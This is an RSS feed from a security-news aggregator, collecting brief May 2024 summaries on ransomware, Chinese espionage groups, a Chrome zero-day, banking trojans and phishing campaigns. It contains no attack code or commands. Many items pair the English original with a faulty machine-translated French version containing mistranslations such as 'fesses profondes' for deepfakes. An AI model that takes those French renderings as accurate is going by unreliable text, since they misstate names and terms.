This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-12T15:39:13+00:00 www.secnews.physaphae.fr SecurityWeek - Security News Un look dans les piliers traditionnels de la culture communautaire de sécurité et comment ils sont affaiblis et compromis, et même jetant un œil à l'endroit où tout cela pourrait aller dans un monde de fesses profondes et de biais et d'hallucination alimentés par l'IA.

---

>A look int the traditional pillars of security community culture and how they are being weakened and compromised, and even peek at where this all could go in a world of deepfakes and AI-fueled bias and hallucination. ]]> 2024-05-28T13:32:24+00:00 https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/ www.secnews.physaphae.fr/article.php?IdArticle=8508601 False Threat None 3.0000000000000000 Global Security Mag - Site de news francais opinion

---

Cyjax: Telltale signs that the Medusa Ransomware group are Russian affiliated by Ian Thornton-Trump, CISO, Cyjax & Roman Faithful, Cyber Threat Intelligence Team Lead, Cyjax - Opinion]]> 2024-05-28T12:16:01+00:00 https://www.globalsecuritymag.fr/cyjax-telltale-signs-that-the-medusa-ransomware-group-are-russian-affiliated.html www.secnews.physaphae.fr/article.php?IdArticle=8508549 False Ransomware,Threat None 3.0000000000000000 Palo Alto Network - Site Constructeur Precision AI by Palo Alto Networks helps security teams trust AI outcomes using security-specific models to automate detection, prevention and remediation. ]]> 2024-05-28T12:00:22+00:00 https://www.paloaltonetworks.com/blog/2024/05/precision-ai-powers-sabres-enhanced-threat-detection-response/ www.secnews.physaphae.fr/article.php?IdArticle=8508490 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Unknown threat actors are abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites that are capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, entails the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. It has over 200 active installations.]]> 2024-05-28T12:00:00+00:00 https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html www.secnews.physaphae.fr/article.php?IdArticle=8508327 False Threat None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC 2024-05-28T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/the-evolution-of-cyber-threats-in-the-age-of-ai-challenges-and-responses www.secnews.physaphae.fr/article.php?IdArticle=8508424 False Malware,Tool,Vulnerability,Threat,Prediction,Conference None 3.0000000000000000 SecurityWeek - Security News Le point de contrôle est averti les clients que les acteurs de la menace ciblent les instances de VPN sans sécurité pour l'accès initial aux réseaux d'entreprise.

---

>Check Point is warning customers that threat actors are targeting insecure VPN instances for initial access to enterprise networks.  ]]> 2024-05-28T08:57:31+00:00 https://www.securityweek.com/check-point-vpn-targeted-for-initial-access-in-enterprise-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8508733 False Hack,Threat None 4.0000000000000000 IndustrialCyber - cyber risk firms for industrial BlackBerry a révélé que le groupe de menaces persistant avancé basé à Pakistanais, la tribu transparente (APT36), a ciblé le gouvernement indien, la défense et ...

---

>BlackBerry disclosed that the Pakistani-based advanced persistent threat group Transparent Tribe (APT36) targeted the Indian government, defense, and... ]]> 2024-05-27T17:59:53+00:00 https://industrialcyber.co/threats-attacks/blackberry-exposes-cyber-espionage-by-transparent-tribe-targeting-indian-government-defense-sectors/ www.secnews.physaphae.fr/article.php?IdArticle=8507970 False Threat APT 36 3.0000000000000000 Bleeping Computer - Magazine Américain Threat actors are targeting Check Point Remote Access VPN devices in an ongoing campaign to breach enterprise networks, the company warned in a Monday advisory. [...]]]> 2024-05-27T14:19:21+00:00 https://www.bleepingcomputer.com/news/security/hackers-target-check-point-vpns-to-breach-enterprise-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8508000 False Threat None 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Pour les dernières découvertes de cyber-recherche pour la semaine du 20 mai, veuillez télécharger notre bulletin menace_intelligence.Les principales attaques et violations d'une violation de données ont exposé 500 Go de données biométriques indiennes, affectant la police indienne, le personnel militaire et d'autres travailleurs publics lors des élections en Inde.La fuite provenait de bases de données non garanties gérées par ThoughtGreen Technologies [& # 8230;]

---

>For the latest discoveries in cyber research for the week of 20th May, please download our Threat_Intelligence Bulletin. TOP ATTACKS AND BREACHES A data breach has exposed 500GB of Indian biometric data, affecting Indian police, military personnel, and other public workers during elections in India. The leak stemmed from unsecured databases managed by ThoughtGreen Technologies […] ]]> 2024-05-27T12:23:17+00:00 https://research.checkpoint.com/2024/27th-may-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8507826 False Data Breach,Threat,Legislation None 2.0000000000000000 Kaspersky - Kaspersky Research blog In this report Kaspersky ICS CERT shares statistics on threats blocked on ICS computers globally and in separate regions in Q1 2024: share of attacked computers, most affected industries, most common types of threats.]]> 2024-05-27T10:00:04+00:00 https://securelist.com/industrial-threat-landscape-q1-2024/112683/ www.secnews.physaphae.fr/article.php?IdArticle=8507736 False Threat,Industrial None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have discovered a critical security flaw in an artificial intelligence (AI)-as-a-service provider Replicate that could have allowed threat actors to gain access to proprietary AI models and sensitive information. "Exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate\'s platform customers,"]]> 2024-05-25T14:41:00+00:00 https://thehackernews.com/2024/05/experts-find-flaw-in-replicate-ai.html www.secnews.physaphae.fr/article.php?IdArticle=8506643 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The MITRE Corporation has revealed that the cyber attack targeting the not-for-profit company towards late December 2023 by exploiting zero-day flaws in Ivanti Connect Secure (ICS) involved the actor creating rogue virtual machines (VMs) within its VMware environment. "The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access," MITRE]]> 2024-05-24T22:00:00+00:00 https://thehackernews.com/2024/05/hackers-created-rogue-vms-to-evade.html www.secnews.physaphae.fr/article.php?IdArticle=8506215 False Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - North America - South America ## Snapshot Forcepoint reports on Metamorfo Banking Trojan, also known as Casbaneiro, that is a banking trojan that targets North and South America. ## Description he malware spreads through malspam campaigns, enticing users to click on HTML attachments. Once clicked, a series of activities are initiated, all focused on gathering system metadata. The malware is distributed via email and the attachment contains malicious codes that lead to data compromise. The PowerShell commands are utilized to drop the files at various suspicious locations, shutdown the system, and cause persistence to steal user data such as computer names, modifying system settings, user settings, keylogging, and sending it to compromised systems. Forcepoint customers are protected against this threat at various stages of attack. ## References ["Exploring the Metamorfo Banking Trojan"](https://www.forcepoint.com/blog/x-labs/exploring-metamorfo-banking-malware) Forcepoint (Accessed 2024-05-24)]]> 2024-05-24T19:09:46+00:00 https://community.riskiq.com/article/72f52370 www.secnews.physaphae.fr/article.php?IdArticle=8506313 False Malware,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-24T18:42:00+00:00 https://community.riskiq.com/article/c95e7fd5 www.secnews.physaphae.fr/article.php?IdArticle=8506285 True Ransomware,Spam,Malware,Tool,Threat,Commercial None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors have been observed making use of fake websites masquerading as legitimate antivirus solutions from Avast, Bitdefender, and Malwarebytes to propagate malware capable of stealing sensitive information from Android and Windows devices. "Hosting malicious software through sites which look legitimate is predatory to general consumers, especially those who look to protect their devices]]> 2024-05-24T18:20:00+00:00 https://thehackernews.com/2024/05/fake-antivirus-websites-deliver-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8506136 False Malware,Threat,Mobile None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Don\'t be fooled into thinking that cyber threats are only a problem for large organizations. The truth is that cybercriminals are increasingly targeting smaller businesses, and they\'re getting smarter every day. Join our FREE webinar "Navigating the SMB Threat Landscape: Key Insights from Huntress\' Threat Report," in which Jamie Levy - Director of Adversary Tactics at Huntress, a renowned]]> 2024-05-24T17:19:00+00:00 https://thehackernews.com/2024/05/how-do-hackers-blend-in-so-well-learn.html www.secnews.physaphae.fr/article.php?IdArticle=8506072 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-24T17:17:36+00:00 https://community.riskiq.com/article/a8c96e40 www.secnews.physaphae.fr/article.php?IdArticle=8508821 False Malware,Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Google on Thursday rolled out fixes to address a high-severity security flaw in its Chrome browser that it said has been exploited in the wild. Assigned the CVE identifier CVE-2024-5274, the vulnerability relates to a type confusion bug in the V8 JavaScript and WebAssembly engine. It was reported by Clément Lecigne of Google\'s Threat Analysis Group and Brendon Tiszka of]]> 2024-05-24T15:40:00+00:00 https://thehackernews.com/2024/05/google-detects-4th-chrome-zero-day-in.html www.secnews.physaphae.fr/article.php?IdArticle=8506074 False Vulnerability,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch The tech company has rolled out fixes for a type confusion vulnerability that has already been exploited by malicious actors.]]> 2024-05-24T15:31:07+00:00 https://www.darkreading.com/vulnerabilities-threats/google-discovers-fourth-zero-day-in-less-than-a-month www.secnews.physaphae.fr/article.php?IdArticle=8506193 False Vulnerability,Threat None 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Une partie importante de la vision de NetSkope se concentre sur la responsabilité que nous avons pour soutenir nos communautés plus larges. & # 160;Cela est évident dans la façon dont notre technologie aide la communauté de la sécurité mondiale à protéger contre le paysage des menaces en constante évolution.Mais nous pensons qu'il est également incroyablement important que nous allions au-delà de la technologie et exploitez la puissance [& # 8230;]

---

>An important part of the Netskope vision centers around the responsibility we have for supporting our wider communities.  This is apparent in the way that our technology helps the global security community protect against the ever evolving threat landscape. But we believe it’s also incredibly important that we go beyond technology, and harness the power […] ]]> 2024-05-24T15:05:50+00:00 https://www.netskope.com/blog/understanding-netskope-for-good www.secnews.physaphae.fr/article.php?IdArticle=8506163 False Threat None 2.0000000000000000 Dark Reading - Informationweek Branch An effective, long-term XDR strategy will address the ongoing need for rapid analysis and continual vetting of the latest threat intelligence.]]> 2024-05-24T12:31:01+00:00 https://www.darkreading.com/cybersecurity-operations/future-proof-your-cybersecurity-ai-strategy www.secnews.physaphae.fr/article.php?IdArticle=8506104 False Threat None 2.0000000000000000 SecurityWeek - Security News Noteworthy stories that might have slipped under the radar: Chinese repair ships might be spying on undersea communications, spyware found at hotel check-ins, UK not ready for China threat. ]]> 2024-05-24T11:30:00+00:00 https://www.securityweek.com/in-other-news-chinas-undersea-spying-hotel-spyware-irans-disruptive-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8506066 False Threat None 3.0000000000000000 Schneier on Security - Chercheur Cryptologue Américain zéro progrès les jours: comment les dix dernières années ont créé le moderne moderneMarché des logiciels espions & # 8220 ;: Résumé: Les logiciels espions facilitent la surveillance.Les dix dernières années ont vu un marché mondial émerger pour les logiciels prêts à l'emploi qui permettent aux gouvernements de surveiller leurs citoyens et leurs adversaires étrangers et pour le faire plus facilement que lorsque ces travaux nécessitaient des métiers.Les dix dernières années ont également été marquées par des échecs frappés de contrôler les logiciels espions et ses précurseurs et composants.Cet article tient compte et critique ces échecs, offrant une histoire socio-technique depuis 2014, en se concentrant en particulier sur la conversation sur le commerce des vulnérabilités et des exploits zéro-jour.Deuxièmement, cet article applique des leçons de ces échecs pour guider les efforts réglementaires à l'avenir.Tout en reconnaissant que le contrôle de ce commerce est difficile, je soutiens que les pays devraient se concentrer sur la construction et le renforcement des coalitions multilatérales des institutions multilatérales disposées, plutôt que sur les institutions multilatérales existantes fortes pour travailler sur le problème.Individuellement, les pays devraient se concentrer sur les contrôles à l'exportation et autres sanctions qui ciblent les mauvais acteurs spécifiques, plutôt que de se concentrer sur la restriction des technologies particulières.Enfin, je continue d'appeler la transparence en tant que partie clé de la surveillance des gouvernements nationaux & # 8217;Utilisation de logiciels espions et de composants associés ...

---

New paper: “Zero Progress on Zero Days: How the Last Ten Years Created the Modern Spyware Market“: Abstract: Spyware makes surveillance simple. The last ten years have seen a global market emerge for ready-made software that lets governments surveil their citizens and foreign adversaries alike and to do so more easily than when such work required tradecraft. The last ten years have also been marked by stark failures to control spyware and its precursors and components. This Article accounts for and critiques these failures, providing a socio-technical history since 2014, particularly focusing on the conversation about trade in zero-day vulnerabilities and exploits. Second, this Article applies lessons from these failures to guide regulatory efforts going forward. While recognizing that controlling this trade is difficult, I argue countries should focus on building and strengthening multilateral coalitions of the willing, rather than on strong-arming existing multilateral institutions into working on the problem. Individually, countries should focus on export controls and other sanctions that target specific bad actors, rather than focusing on restricting particular technologies. Last, I continue to call for transparency as a key part of oversight of domestic governments’ use of spyware and related components...]]> 2024-05-24T11:07:53+00:00 https://www.schneier.com/blog/archives/2024/05/on-the-zero-day-market.html www.secnews.physaphae.fr/article.php?IdArticle=8506065 False Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-24T01:09:17+00:00 https://community.riskiq.com/article/8ca39741 www.secnews.physaphae.fr/article.php?IdArticle=8505826 False Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Ransomware attacks targeting VMware ESXi infrastructure following an established pattern regardless of the file-encrypting malware deployed. "Virtualization platforms are a core component of organizational IT infrastructure, yet they often suffer from inherent misconfigurations and vulnerabilities, making them a lucrative and highly effective target for threat actors to abuse,"]]> 2024-05-23T22:33:00+00:00 https://thehackernews.com/2024/05/ransomware-attacks-exploit-vmware-esxi.html www.secnews.physaphae.fr/article.php?IdArticle=8505590 False Ransomware,Malware,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Elastic Security Labs has identified an intrusion set, REF4578, that incorporates several malicious modules and leverages vulnerable drivers to disable known security solutions (EDRs) for crypto mining. ## Description The primary payload of this intrusion set is GHOSTENGINE, which is responsible for retrieving and executing modules on the machine. GHOSTENGINE primarily uses HTTP to download files from a configured domain, with a backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig. The malware authors incorporated many contingency and duplication mechanisms, and GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner. This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner. The malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent and then deletes the security agent binary with another vulnerable]]> 2024-05-23T21:02:25+00:00 https://community.riskiq.com/article/c2420a77 www.secnews.physaphae.fr/article.php?IdArticle=8505727 False Malware,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The China-linked threat actor known as Sharp Panda has expanded their targeting to include governmental organizations in Africa and the Caribbean as part of an ongoing cyber espionage campaign. "The campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools," Check Point]]> 2024-05-23T19:20:00+00:00 https://thehackernews.com/2024/05/new-frontiers-old-tactics-chinese-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=8505502 False Tool,Threat None 3.0000000000000000 TechRepublic - Security News US Find out how Grandoreiro banking trojan campaigns work and the countries targeted, as well as how to mitigate this malware threat.]]> 2024-05-23T18:34:07+00:00 https://www.techrepublic.com/article/ibm-xforce-grandoreiro-banking-trojan-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8505618 False Malware,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Governmental entities in the Middle East, Africa, and Asia are the target of a Chinese advanced persistent threat (APT) group as part of an ongoing cyber espionage campaign dubbed Operation Diplomatic Specter since at least late 2022. "An analysis of this threat actor\'s activity reveals long-term espionage operations against at least seven governmental entities," Palo Alto Networks]]> 2024-05-23T16:44:00+00:00 https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html www.secnews.physaphae.fr/article.php?IdArticle=8505403 False Threat None 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine According to Enea, these campaigns use cloud storage platforms to host malicious websites, sending links via SMS to bypass firewalls]]> 2024-05-23T16:15:00+00:00 https://www.infosecurity-magazine.com/news/cloud-storage-exploited-sms/ www.secnews.physaphae.fr/article.php?IdArticle=8505564 False Threat,Cloud None 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Introduction des résultats clés Depuis 2021, les recherches sur le point de contrôle ont surveillé de près les activités de Sharp Dragon (anciennement appelé Panda Sharp *), un acteur de menace chinois.Les activités historiques consistent principalement en des e-mails de phishing hautement ciblés, conduisant auparavant au déploiement de & # 160; victorydll & # 160; ou & # 160; soul & # 160; framework.Alors que les opérateurs de dragons tranchants finaux ont déployé des heures supplémentaires, leur modus operandi [& # 8230;]

---

>Key Findings Introduction Since 2021, Check Point Research has been closely monitoring the activities of Sharp Dragon (Formerly referred to as Sharp Panda*), a Chinese threat actor. Historical activities mostly consist of highly-targeted phishing emails, previously leading to the deployment of VictoryDLL or Soul framework. While the final payloads Sharp Dragon operators have deployed overtime changed, their modus operandi […] ]]> 2024-05-23T13:07:07+00:00 https://research.checkpoint.com/2024/sharp-dragon-expands-towards-africa-and-the-caribbean/ www.secnews.physaphae.fr/article.php?IdArticle=8505435 False Threat None 2.0000000000000000 Checkpoint - Fabricant Materiel Securite La recherche sur les points de contrôle (RCR) voit une campagne de cyber-espionnage en cours se concentre sur le ciblage des organisations gouvernementales en Afrique et dans les Caraïbes.Attribué à un acteur de menace chinois Sharp Dragon (anciennement Sharp Panda), la campagne adopte Cobalt Strike Beacon en tant que charge utile, permettant des fonctionnalités de porte dérobée telles que la communication C2 et l'exécution des commandes tout en minimisant l'exposition de leurs outils personnalisés.Cette approche raffinée suggère une compréhension plus profonde de leurs cibles.Les principales constatations de Dragon Sharp \\ (anciennement appelées opérations de panda pointues) se poursuivent, élargissant maintenant leur objectif vers de nouvelles régions & # 8211;L'Afrique et les Caraïbes.Sharp Dragon utilise des entités gouvernementales de confiance pour infecter de nouvelles [& # 8230;]

---

>Check Point Research (CPR) sees an ongoing cyber espionage campaign focuses on targeting governmental organizations in Africa and the Caribbean. Attributed to a Chinese threat actor Sharp Dragon (formerly Sharp Panda), the campaign adopts Cobalt Strike Beacon as the payload, enabling backdoor functionalities like C2 communication and command execution while minimizing the exposure of their custom tools. This refined approach suggests a deeper understanding of their targets. Key Findings Sharp Dragon\'s (formerly referred to as Sharp Panda) operations continues, expanding their focus now to new regions – Africa and the Caribbean. Sharp Dragon utilizes trusted government entities to infect new […] ]]> 2024-05-23T13:00:02+00:00 https://blog.checkpoint.com/research/chinese-espionage-campaign-expands-to-target-africa-and-the-caribbean/ www.secnews.physaphae.fr/article.php?IdArticle=8505461 False Tool,Threat None 2.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Résumé Netskope Threat Labs suit plusieurs campagnes de phishing qui abusent des travailleurs de CloudFlare.Les campagnes sont probablement le travail de différents attaquants car ils utilisent deux techniques très différentes.Une campagne (similaire à la campagne Azorult précédemment divulguée) utilise HTML debout, une technique d'évasion de détection souvent utilisée pour télécharger des logiciels malveillants, pour masquer le contenu de phishing [& # 8230;]

---

>Summary Netskope Threat Labs is tracking multiple phishing campaigns that abuse Cloudflare Workers. The campaigns are likely the work of different attackers since they use two very different techniques. One campaign (similar to the previously disclosed Azorult campaign) uses HTML smuggling, a detection evasion technique often used for downloading malware, to hide the phishing content […] ]]> 2024-05-23T13:00:00+00:00 https://www.netskope.com/blog/phishing-with-cloudflare-workers-transparent-phishing-and-html-smuggling www.secnews.physaphae.fr/article.php?IdArticle=8505431 False Malware,Threat None 3.0000000000000000 DarkTrace - DarkTrace: AI bases detection In recent months, we\'ve seen a dramatic rise in the number of attacks using Microsoft Teams as a threat vector. This blog will explore why Teams is becoming such a popular entry point, how built-in and market security offerings fail to address sophisticated Teams threats, and why behavioral AI is the solution to early detection of Teams-based social engineering and account compromise.]]> 2024-05-23T11:36:00+00:00 https://darktrace.com/blog/how-to-protect-your-organization-against-microsoft-teams-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8505394 False Threat None 3.0000000000000000 SecurityWeek - Security News Les attaquants deviennent plus sophistiqués, mieux armés et plus rapides.Rien dans Rapid7 \'s 2024 Attack Intelligence Report suggère que cela changera.

---

>Attackers are getting more sophisticated, better armed, and faster. Nothing in Rapid7\'s 2024 Attack Intelligence Report suggests that this will change. ]]> 2024-05-23T11:00:00+00:00 https://www.securityweek.com/zero-day-attacks-and-supply-chain-compromises-surge-mfa-remains-underutilized-rapid7-report/ www.secnews.physaphae.fr/article.php?IdArticle=8505399 False Vulnerability,Threat None 2.0000000000000000 The Register - Site journalistique Anglais Massive discount applied to save cop shop\'s helicopter budget Following a data leak that brought "tangible fear of threat to life", the UK\'s data protection watchdog says it intends to fine the Police Service of Northern Ireland (PSNI) £750,000 ($955,798).…]]> 2024-05-23T08:30:13+00:00 https://go.theregister.com/feed/www.theregister.com/2024/05/23/uks_ico_wants_six_figures/ www.secnews.physaphae.fr/article.php?IdArticle=8505306 False Threat,Legislation None 3.0000000000000000 ProofPoint - Cyber Firms 2024-05-23T08:02:17+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/proofpoint-vs-abnormal-security-fortune-500-company-explains-why-one www.secnews.physaphae.fr/article.php?IdArticle=8505429 False Ransomware,Malware,Tool,Threat None 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Easterly, Krebs et d'autres discutent de la violation de l'Ivanti, expirant les protections juridiques pour les entreprises qui partagent des données sur les menaces avec les fédérales et les progrès du JCDC.

---

>Easterly, Krebs and others discuss Ivanti breach, expiring legal protections for companies that share threat data with feds, and JCDC progress. ]]> 2024-05-23T01:07:40+00:00 https://cyberscoop.com/current-former-government-cyber-officials-tout-industry-collaboration-advancements/ www.secnews.physaphae.fr/article.php?IdArticle=8505126 False Threat None 2.0000000000000000 Cyber Futures - Podcast Cyber Moonshot, a global leader in fighting online dangers, has just launched an online guide to help people spot fake news before the European Elections. You can find this guide on the EU Prebunking site. It has videos and resources to teach you how to recognize and deal with false information and manipulation. Moonshot, an international company with offices in Dublin, was co-founded by Ross Frenett from Cobh, Cork. His presentation at TechFest 2022 in Cork was memorable, showing Moonshot\'s dedication to making the internet safer. Aoife Long, the Cyber Skills Education and Public Engagement Manager, attended the event and said, “I found his talk fascinating, especially how technology can be combined with his understanding of counter-terrorism to protect citizens.” You can learn more about Moonshot and their projects on their website. The ENISA Threat Landscape 2023 report has identified information manipulation as a major threat. ENISA, the European Union Agency for Cybersecurity, regularly publishes these reports to inform industry professionals about current threats and emphasize the need for vigilance and proactive measures against cyber threats. For more information and to access the guide, visit the EU Prebunking site. Stay informed and help protect the upcoming European Elections. ]]> 2024-05-23T00:00:00+00:00 https://www.cyberfutures.ie/news/moonshot-launches-new-guide-to-spotting-manipulation-ahead-of-european-elections.html www.secnews.physaphae.fr/article.php?IdArticle=8517371 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot The Governmental Computer Emergency Reponse Team of Ukraine (CERT-UA) has observed increased activity from a financially movtivated threat actor they track as UAC-0006. Since May 20, 2024, the group has conducted at least two distinct malware distribution campaigns. ## Description CERT-UA reports that these campaigns are distributing SmokeLoader malware via phishing emails. These emails contain ZIP archives with malicious files, including .IMG files with executable (.exe) files and Microsoft Access (.ACCDB) documents with embedded macros. These macros execute PowerShell commands to download and run the executable files. After initial system compromise, additional malware such as Taleshot and RMS are downloaded and installed. Currently, the botnet comprises several hundred infected computers. As a result of this increased activity, CERT-UA expects an increase in fraud schemes targeting remote banking systems in the near future. ## Detections **Microsoft Defender Antivirus** Microsoft Defender Antivirus detects threat components as the following malware: - [*Trojan:Win32/SmokeLoader*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SmokeLoader&threatId=-2147238753) - *[Trojan:Win64/Smokeloader](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Smokeloader&threatId=-2147113809)* ## References [UAC-0006 Increased Cyberattacks](https://cert.gov.ua/article/6279366). Computer Emergency Response Team of Ukraine (accessed 2024-05-22)]]> 2024-05-22T20:16:56+00:00 https://community.riskiq.com/article/7bef5f52 www.secnews.physaphae.fr/article.php?IdArticle=8505023 False Malware,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have disclosed details of a previously undocumented threat group called Unfading Sea Haze that\'s believed to have been active since 2018. The intrusion singled out high-level organizations in South China Sea countries, particularly military and government targets, Bitdefender said in a report shared with The Hacker News. "The investigation revealed a troubling]]> 2024-05-22T19:45:00+00:00 https://thehackernews.com/2024/05/researchers-warn-of-chinese-aligned.html www.secnews.physaphae.fr/article.php?IdArticle=8504840 False Threat None 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Le directeur national du cyber Harry Coker a déclaré qu'il doutait que le public américain réalise toute la portée de la menace de cybersécurité aux États-Unis.

---

>National Cyber Director Harry Coker said he doubts the U.S. public realizes the full scope of the cybersecurity threat facing the United States. ]]> 2024-05-22T18:54:48+00:00 https://cyberscoop.com/harry-coker-china-critical-infrastructure-cyber/ www.secnews.physaphae.fr/article.php?IdArticle=8504934 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-22T16:31:26+00:00 https://community.riskiq.com/article/bc072613 www.secnews.physaphae.fr/article.php?IdArticle=8504898 False Spam,Malware,Tool,Threat,Legislation None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-22T15:21:21+00:00 https://community.riskiq.com/article/d5d5c07f www.secnews.physaphae.fr/article.php?IdArticle=8504864 False Ransomware,Malware,Tool,Threat APT 34 3.0000000000000000 Global Security Mag - Site de news francais revues de produits

---

Tigera Extends Calico Commercial Editions\' Capabilities to Simplify Security Operations for Runtime Threat Detection for Cloud-Native Applications Latest enhancements streamline the deployment and implementation of runtime security and observability for Kubernetes - Product Reviews]]> 2024-05-22T14:45:00+00:00 https://www.globalsecuritymag.fr/tigera-extends-calico-commercial-editions-capabilities.html www.secnews.physaphae.fr/article.php?IdArticle=8504809 False Threat,Commercial None 2.0000000000000000 The Last Watchdog - Blog Sécurité de Byron V Acohido Torrance, Californie, 22 mai 2024, CyberNewswire & # 8212;AI Spera, un leader des solutions de renseignement cyber-menace (CTI), a annoncé aujourd'hui que son moteur de recherche propriétaire, IP criminel , est maintenant disponible sur le AWS Marketplace . Cette intégration garantit un achat de logiciel efficace & # 8230; (Plus…) Le post News Alert: Ai Spera intègre son outil de renseignement Criminal ip \\ 'menace dans AWS Marketplace est apparu pour la première fois sur le dernier chien de garde .

---

>Torrance,Calif., May 22, 2024, CyberNewsWire — AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, announced today that its proprietary search engine, Criminal IP, is now available on the AWS Marketplace. This integration ensures efficient software procurement … (more…) The post News alert: AI SPERA integrates its \'Criminal IP\' threat intelligence tool into AWS Marketplace first appeared on The Last Watchdog.]]> 2024-05-22T14:20:38+00:00 https://www.lastwatchdog.com/news-alert-ai-spera-integrates-its-criminal-ip-threat-intelligence-tool-into-aws-marketplace/ www.secnews.physaphae.fr/article.php?IdArticle=8504799 False Tool,Threat None 3.0000000000000000 HackRead - Chercher Cyber Par cyber navre AI Spera, un leader des solutions de la cyber-menace (CTI), a annoncé aujourd'hui que son moteur de recherche propriétaire, Criminal & # 8230; Ceci est un article de HackRead.com Lire le message original: IP criminel: améliorant les solutions de sécurité via l'intégration AWS Marketplace

---

>By Cyber Newswire AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, announced today that its proprietary search engine, Criminal… This is a post from HackRead.com Read the original post: Criminal IP: Enhancing Security Solutions through AWS Marketplace Integration]]> 2024-05-22T14:00:35+00:00 https://www.hackread.com/criminal-ip-security-solution-aws-marketplace-integration/ www.secnews.physaphae.fr/article.php?IdArticle=8504906 False Threat None 3.0000000000000000 Mandiant - Blog Sécu de Mandiant   Mandiant Intelligence is tracking a growing trend among China-nexus cyber espionage operations where advanced persistent threat (APT) actors utilize proxy networks known as “ORB networks” (operational relay box networks) to gain an advantage when conducting espionage operations. ORB networks are akin to botnets and are made up of virtual private servers (VPS), as well as compromised Internet of Things (IoT) devices, smart devices, and routers that are often end of life or unsupported by their manufacturers. Building networks of compromised devices allows ORB network administrators to easily grow the size of their ORB network with little effort and create a constantly evolving mesh network that can be used to conceal espionage operations.  By using these mesh networks to conduct espionage operations, actors can disguise external traffic between command and control (C2) infrastructure and victim environments including vulnerable edge devices that are being exploited via zero-day vulnerabilities.  These networks often use both rented VPS nodes in combination with malware designed to target routers so they can grow the number of devices capable of relaying traffic within compromised networks.  Mandiant assesses with moderate confidence that this is an effort to raise the cost of defending an enterprise\'s network and shift the advantage toward espionage operators by evading detection and complicating attribution. Mandiant believes that if network defenders can shift the current enterprise defense paradigm away from treating adversary infrastructure like indicators of compromise (IOCs) and instead toward tracking ORB networks like evolving entities akin to APT groups, enterprises can contend with the rising challenge of ORB networks in the threat landscape. IOC Extinction and the Rise of ORB Networks The cybersecurity industry has reported on the APT practice of ORB network usage in the past as well as on the functional implementation of these networks. Less discussed are the implications of broad ORB network usage by a multitude of China-nexus espionage actors, which has become more common over recent years. The following are three key points and paradigm shifting implications about ORB networks that require enterprise network defenders to adapt the way they think about China-nexus espionage actors: ORB networks undermine the idea of “Actor-Controlled 